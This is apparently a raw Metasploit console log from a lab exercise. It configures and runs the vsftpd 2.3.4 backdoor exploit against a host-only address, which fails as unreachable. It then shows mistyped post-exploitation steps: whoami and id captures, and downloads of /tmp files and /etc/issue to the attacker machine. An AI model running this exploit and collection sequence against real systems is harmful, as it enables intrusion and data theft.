Metasploit tip: View all productivity tips with the tips command
[0m[36m[0m
 ______________________________________________________________________________
|                                                                              |
|                   [1m[32mMETASPLOIT CYBER MISSILE COMMAND V5[0m                        |
|______________________________________________________________________________|
      [33m\[0m                                  [33m/[0m                      [33m/[0m
       [33m\[0m     .                          [33m/[0m                      [33m/[0m            x
        [33m\[0m                              [33m/[0m                      [33m/[0m
         [33m\[0m                            [33m/[0m          +           [33m/[0m
          [33m\[0m            +             [33m/[0m                      [33m/[0m
           *                        [33m/[0m                      [33m/[0m
                                   [33m/[0m      .               [33m/[0m
    X                             [33m/[0m                      [33m/[0m            X
                                 [33m/[0m                     [31m###[0m
                                [33m/[0m                     [31m# [1m%[0m[31m #[0m
                               [33m/[0m                       [31m###[0m
                      .       [33m/[0m
     .                       [33m/[0m      .            [31m*[0m           .
                            [33m/[0m
                           *
                  +                       [31m*[0m

                                       [1m^[0m
####      __     __     __          #######         __     __     __        ####
####    [33m/[0m    [33m\[0m [33m/[0m    [33m\[0m [33m/[0m    [33m\[0m      ###########     [33m/[0m    [33m\[0m [33m/[0m    [33m\[0m [33m/[0m    [33m\[0m      ####
################################################################################
################################################################################
# [1mWAVE 5[0m ######## [1mSCORE 31337[0m ################################## [1mHIGH FFFFFFFF[0m #
################################################################################
                                                           https://metasploit.com[0m
[0m

       =[ [33mmetasploit v6.4.84-dev[0m                                ]
+ -- --=[ 2,547 exploits - 1,309 auxiliary - 1,683 payloads     ]
+ -- --=[ 432 post - 49 encoders - 13 nops - 9 evasion          ]

Metasploit Documentation: https://docs.metasploit.com/
The Metasploit Framework is a Rapid7 Open Source Project

[1m[34m[*][0m Processing /home/rajarshi/task4/exploitation/run_vsftpd.rc for ERB directives.
resource (/home/rajarshi/task4/exploitation/run_vsftpd.rc)> use exploit/unix/ftp/vsftpd_234_backdoor
[0m[1m[34m[*][0m No payload configured, defaulting to cmd/unix/interact
resource (/home/rajarshi/task4/exploitation/run_vsftpd.rc)> set RHOSTS 192.168.56.101
[0mRHOSTS => 192.168.56.101
resource (/home/rajarshi/task4/exploitation/run_vsftpd.rc)> set LHOST 192.168.56.102
[0m[1m[33m[!][0m Unknown datastore option: LHOST. Did you mean RHOST?
LHOST => 192.168.56.102
resource (/home/rajarshi/task4/exploitation/run_vsftpd.rc)> set LPORT 4444
[0m[1m[33m[!][0m Unknown datastore option: LPORT. Did you mean RPORT?
LPORT => 4444
resource (/home/rajarshi/task4/exploitation/run_vsftpd.rc)> show options
[0m
Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CHOST                     no        The local client address
   CPORT                     no        The local client port
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]. Supported prox
                                       ies: sapni, socks4, socks5, http, socks5h
   RHOSTS   192.168.56.101   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/ba
                                       sics/using-metasploit.html
   RPORT    21               yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the [32minfo[0m, or [32minfo -d[0m command.

resource (/home/rajarshi/task4/exploitation/run_vsftpd.rc)> exploit
[0m[1m[31m[-][0m 192.168.56.101:21 - Exploit failed [unreachable]: Rex::HostUnreachable The host (192.168.56.101:21) was unreachable.
[1m[34m[*][0m Exploit completed, but no session was created.
[?1034h[4mmsf[0m exploit([1m[31munix/ftp/vsftpd_234_backdoor[0m) [0m> sysinfo
[0m[1m[31m[-][0m Unknown command: sysinfo. Run the [32mhelp[0m command for more details.
[4mmsf[0m exploit([1m[31munix/ftp/vsftpd_234_backdoor[0m) [0m> shell
[0m[1m[31m[-][0m Unknown command: shell. Run the [32mhelp[0m command for more details.
[4mmsf[0m exploit([1m[31munix/ftp/vsftpd_234_backdoor[0m) [0m> /tmp/whoami.txt
[0m[1m[31m[-][0m Unknown command: /tmp/whoami.txt. Run the [32mhelp[0m command for more details.
[4mmsf[0m exploit([1m[31munix/ftp/vsftpd_234_backdoor[0m) [0m> # inside meterpreter:
[0m[1m[31m[-][0m Unknown command: #. Run the [32mhelp[0m command for more details.
[4mmsf[0m exploit([1m[31munix/ftp/vsftpd_234_backdoor[0m) [0m> meterpreter > sysinfo
[0m[1m[31m[-][0m Unknown command: meterpreter. Run the [32mhelp[0m command for more details.
[4mmsf[0m exploit([1m[31munix/ftp/vsftpd_234_backdoor[0m) [0m> meterpreter > shell
[0m[1m[31m[-][0m Unknown command: meterpreter. Run the [32mhelp[0m command for more details.
[4mmsf[0m exploit([1m[31munix/ftp/vsftpd_234_backdoor[0m) [0m> # in shell on target:
[0m[1m[31m[-][0m Unknown command: #. Run the [32mhelp[0m command for more details.
[4mmsf[0m exploit([1m[31munix/ftp/vsftpd_234_backdoor[0m) [0m> whoami > /tmp/whoami.txt
[0m[1m[34m[*][0m exec: whoami > /tmp/whoami.txt

[4mmsf[0m exploit([1m[31munix/ftp/vsftpd_234_backdoor[0m) [0m> id > /tmp/id.txt
[0m[1m[34m[*][0m exec: id > /tmp/id.txt

[4mmsf[0m exploit([1m[31munix/ftp/vsftpd_234_backdoor[0m) [0m> # exit shell back to meterpreter
[0m[1m[31m[-][0m Unknown command: #. Run the [32mhelp[0m command for more details.
[4mmsf[0m exploit([1m[31munix/ftp/vsftpd_234_backdoor[0m) [0m> meterpreter > download /tmp/whoami.txt /home/kali/task4/post/whoami.txt
[0m[1m[31m[-][0m Unknown command: meterpreter. Run the [32mhelp[0m command for more details.
[4mmsf[0m exploit([1m[31munix/ftp/vsftpd_234_backdoor[0m) [0m> meterpreter > download /tmp/id.txt /home/kali/task4/post/id.txt
[0m[1m[31m[-][0m Unknown command: meterpreter. Run the [32mhelp[0m command for more details.
[4mmsf[0m exploit([1m[31munix/ftp/vsftpd_234_backdoor[0m) [0m> meterpreter > download /etc/issue /home/kali/task4/post/target_issue.txt
[0m[1m[31m[-][0m Unknown command: meterpreter. Run the [32mhelp[0m command for more details.
[4mmsf[0m exploit([1m[31munix/ftp/vsftpd_234_backdoor[0m) [0m> exit
[0m